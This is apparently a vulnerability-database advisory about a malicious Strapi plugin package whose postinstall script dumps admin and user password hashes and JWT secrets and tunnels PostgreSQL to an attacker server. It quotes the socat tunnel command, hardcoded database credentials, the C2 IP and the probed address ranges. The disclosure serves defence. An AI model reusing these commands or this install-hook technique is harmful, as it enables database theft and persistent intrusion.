VDB

GCVE-110-OSM-2026-1213

GCVE-110-OSM-2026-1213
Advisory PublishedCVSS 9.6/10
Vulnetix · Advisory published April 1, 2026
Connects to a live PostgreSQL instance, dumps the complete strapi_administrator table (bcrypt admin hashes + emails), users-permissions_user table (all CMS user accounts + password hashes), and the entire core_store table (JWT signing secrets, API keys, plugin configs). Installs a persistent socat reverse tunnel (nohup socat TCP-LISTEN:15432,fork,reuseaddr TCP:127.0.0.1:5432 &) forwarding the victim's PostgreSQL port to the attacker C2 144.31.107.231, giving persistent direct DB access after the postinstall.js (193 lines): (1) Probes 127.0.0.1:5432, then Docker bridge IPs 172.17.0.1–172.20.77.2 and 128.140.36.223 for open PostgreSQL. (2) Connects using hardcoded credentials (user_strapi / 1QKtYPp18UsyU2ZwInVM) then escalates to postgres / 1QKtYPp18UsyU2ZwInVM for superuser access. (3) Dumps: all tables with row counts, core_store (ALL rows), strapi_administrator, users-permissions_user, wallet/payment/transaction table contents. (4) Reads Strapi source files: deploy/*.groovy, config/*.js, helpers/*.js, extensions/. (5) Sets up persistent tunnel: execSync('nohup socat TCP-LISTEN:15432,fork,reuseaddr TCP:127.0.0.1:5432 &'). Chunked exfil in 50 KB blocks allows extraction of large databases.

Weaknesses (CWE)

CWE-506Embedded Malicious Code

Risk Scores

CVSS 3.1
9.6/10
Critical · CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H

Affected Products

VendorProductVersionsPlatforms
unknownstrapi-plugin-health-check3.6.8 (affected)

Browse GCVE Records

72,664 records in the GCVE database · Updated July 15, 2026

No matching records found.

Explore Further

Investigate this vulnerability in the interactive console or download the raw GCVE record.

$ Console Community · 100/wk Open console ›